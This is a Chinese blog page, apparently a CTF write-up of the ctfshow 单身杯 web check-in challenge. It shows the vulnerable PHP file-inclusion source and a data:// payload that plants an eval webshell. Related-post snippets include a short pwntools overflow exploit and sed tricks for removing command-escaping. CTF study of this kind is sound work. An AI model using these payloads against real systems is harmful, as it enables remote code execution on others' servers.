ctfshow单身狗 -- web

PHP安全漏洞与绕过技巧
最新推荐文章于 2024-11-15 01:49:40 发布
原创 最新推荐文章于 2024-11-15 01:49:40 发布 · 657 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

本文探讨了两道PHP安全题目,涉及strrev函数的等价比较和escapeshellcmd函数的过滤限制。在签到题pass-01中,通过data://伪协议和PHP注释语法构造payload绕过;在pass-02中,利用sed命令删除escapeshell限制并替换shell_exec为system。这些技巧展示了PHP安全防护的潜在弱点。

pass-01 web签到

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

看到入参file 判断项是 strrev(反转)==正常入参

刚开始考虑过弱等于绕过,但是include没啥用,

后来了解到  2个知识点,,

1.第一可以利用 data://伪协议,

2.php ?>后的内容不再进行运算

所以可以构造如下:

file=data://text/plain,<?php eval($_REQUEST[1]);?>

通过py反转构造完整payload

最低0.47元/天 解锁文章
CTF杂项南城旧梦-BugKu
m0_61011147的博客
01-04 3898
1.mmz.bmp图片文件尾有一段DE@@= 意思是使用工具stool,密码是qeadzc,这个工具使用的话要直接把图片拖进去,解密的话是这个选项,输入密码就可以解出Key.txt,得到把酒言欢.rar的密码mmzbudaiwowuwuwu~~~## 2.倾听.txt是 SNOW隐写【snow隐写见下图】,解密可以得到密码表 3.使用E:\CTF比赛\工具箱\ctf工具箱\爆破工具\Accent RAR Password Recovery\Accent RAR Password
NODEJS复习(ctfshow334-344)
m0_74402888的博客
07-19 1625
判断secert.ctfshow==='36dboy'时,找不到ctfshow,会从Object里面找。return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});Function(query)(query)可以执行query对应的指令,我们可以使用变量覆盖,将query的值作为。
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf misc 杂项 snow隐写加解密
09-03
ctf misc 杂项 snow隐写加解密工具 压缩包中有snow隐写工具帮助手册,值得下载。 SNOW.EXE -C 2.txt Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息" -p 密码 "文件名" snow -C -m "I am lying" -p "hello world" infile outfile snow -C -p "hello world" outfile snow -C -l 72 -m "I am lying" infile outfile snow -S -l 72 infile snow [ -CQS ] [ -p passwd ] [ -l line-len ] [ -f file | -m message ] [ infile [ outfile ]] OPTIONS -Q Quiet mode. If not set, the program reports statistics such as compression percenta
看雪CTF 拯救单身 apwn
snowleopard_bin的博客
03-28 826
漏洞类型 堆的整数负数溢出 保护机制 全保护 关键代码 if ( two[v1] )//没考虑负数 { puts("Oh,singledog,changing your name can bring you good luck."); read(0, (void *)two[v1], 0x20uLL); printf("new name: %s", two[...
单身杯,Webweb签到
Pai_Space
07-15 922
单身杯,Webweb签到
CTFSHOW game-gyctf web2
这周末在做梦的博客
07-22 1624
反序列化增逃逸
ctfshow sqli-labs web532--web540
2301_81040377的博客
06-30 661
但是我做这道题的时候是比较萌萌的,我的payload是应该没错的但是一直触发不了。admin登录之后叫我删除cookie怀疑是cookie注入。这个闭合方式,还正常但是他不出结果,加了个恒等。format函数是将特定内容放入{}占位符中。正常注入我以为我句子写错了 ,原来注入不在。还是比较简单的这里我就不手注入了,麻烦。这三个页面我找不到注入点在哪里,麻了。后面发现DUMB为账号密码也可以。发现是UA注入(用报错注入语句)闭合然后恒等不好写了,我就直接。也可以用python。被base64加密了。
ctfshow web入门 sqli-labs web517--web524
2301_81040377的博客
06-28 613
然后发现这几个表里面没有flag,我们重新倒回去爆库名,肯定是库错了,因为我偷工减料了。盲猜是一个md5闭合我没有跑fuzz,正常做法应该是跑个fuzz。不会的去我主页学,hhh。单引号被过滤了好像是。所以我是自己慢慢试的。闭合换了并且不是盲注。
[ctfshow 单身杯]web writeup&&学习一下sed awk基本用法
weixin_45751765的博客
06-08 1814
想起来之前比赛撞了 单身杯没打完 刚好来复现一下 data伪协议直接过 ?>截断就行poc 远程包含用?参数包含也可 三字长度命令 参数长度任意保证传入字符串参考 sed教程 流程:sed工作流程 sed不用任何语句时可以直接输出源文件内容 本着需要什么学什么的初心 我们直接看payload来学习 sed支持正则匹配 /esca/匹配到 escape行 d 将其删除 sed语句用;间隔开 s字符串替换 shell_exec -> system g为全局替换标志w 写入 -->可以看作cp的功能版 将
ctfshow 单身杯(dsb)
qq_29634299的博客
05-22 1431
OSINT 任性老板 用yandex识图搜到虎扑的关于这个点的信息 https://bbs.hupu.com/27645621.html 通过恢复知道这个店铺的名字叫左撇子私房面 通过百度搜索店面即可获得电话号码 蛤壳雪茄-1 谷歌识图找到原图 知道它是mary river aerodrome这个 搜索得到 搜索这第一个公司的名字即可得到公司网站得到flag re re签到 拖到 IDA中 f5反汇编,看到 if ( !strcmp(v5, "V2toT2FWZ3pTbXhZTTA1d1dqSTFabU
ctfshow | 单身杯dsb | pwn | pwn签到
Dem1的博客
05-22 531
from pwn import * p = remote('pwn.challenge.ctf.show',28018) #p =process('./pwn01') shell_here = 0x80484f6 payload = 'a'*(0x10+0x4) + p32(shell_here) p.sendline(payload) p.interactive()
ctfshow单身杯部分wp
m0_62422842的博客
07-09 1217
php伪协议,sed命令和awk命令的用法与应用。SSTI的绕过
PAT-A1121/B1065 Damn Single/单身 题目内容及题解
BourbonWhiskey 的博客
02-10 530
"Damn Single (单身)" is the Chinese nickname for someone who is being single. You are supposed to find those who are alone in a big party, so they can be taken care of. “单身”是中文对于单身人士的一种爱称。本题请你从上万人的大型...
CTFSHOW-单身杯(WEB部分复现WP)
qq_61620566的博客
11-15 5399
CTFSHOW单身杯赛后复盘
ctfshow单身
Landasika的博客
05-25 1746
ctfshow单身web1. web签到 题目代码如下: <?php # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-03-19 12:10:55 # @Last Modified by: h1xa # @Last Modified time: 2022-03-19 13:27:18 # @email: h1xa@ctfer.com # @link: https://ctfer.com error_reporting(0);
ctfshow | 单身杯dsb | pwn | ctfshow_OA
Dem1的博客
05-22 575
#create user&password -> login -> validate psn session -> from pwn import * p = remote("pwn.challenge.ctf.show",28156) #-----main -> menu #-----from main #-----create_new_user p.sendline('1') p.recvuntil('username :') p.sendline('pwn')#
PAT 乙级练习 1065 单身 - 超级详细的思路讲解
Gorgeoustray
04-21 1063
主要思路是不断地从 guests 中删去已经辨识过的 ID,并将单身的 ID 丢进 singles,直到 guests 空为止。
CTFShow-WEB(签到题~5) WP
PP Jun的博客
08-01 1191
CTFSHOW-web-web4
最新发布
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值